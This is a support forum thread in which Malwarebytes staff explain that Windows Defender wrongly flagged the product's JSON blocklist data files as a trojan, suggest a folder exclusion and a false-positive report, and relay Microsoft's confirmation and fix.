Jump to content
cfoster8

Trojan found in Malwarebytes product

Recommended Posts

I'm 99% sure. These files have been created by us for awhile, and from the logs provided, they are being provided correctly but Defender is flagging them, most likely because we store metadata about different infections in these files (not actual infections, just information).

Share this post


Link to post
Share on other sites

Please give us more information if you get it, but I guess I shouldn't worry about this?

Share this post


Link to post
Share on other sites

I merged all the topics together to help keep this information in one place. There's a few things that you can do to help here as well:

  1. In Windows Defender, add an exclusion for C:\ProgramData\Malwarebytes\mbamservice. Since this is the folder we use to store all of our data, and it's protected by our Self-Protection module, you can safely exclude this folder from Defender.
  2. Report this detection to Microsoft using their False Positive page: https://www.microsoft.com/en-us/wdsi/filesubmission. You will need to find one of the sample JSON files in the Defender quarantine to submit.

We are also reaching out to Microsoft with this information, but user reports go a long way for companies in these situations.

Share this post


Link to post
Share on other sites

We just got word from Microsoft that this was a false positive on their end and should now be resolved.

Share this post


Link to post
Share on other sites
1 hour ago, Tezzle said:

So, I can safely reinstall Malwarebytes?There's nothing to worry about?

Yes, it was a false positive by Microsoft as I suggested earlier.  Microsoft has now confirmed it and have corrected it so users of Windows Defender will no longer see these detections.  The issue was as I speculated, overly aggressive heuristics in their detection signatures.  They were using basic text string detection to flag any file containing a specific known malicious URL.  Since Malwarebytes blocks malicious websites and stores some of the black list information in some of these .JSON files, it means that the Windows Defender signature would flag these files when this string of text was found, misidentifying them as threats when they were just benign data files.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.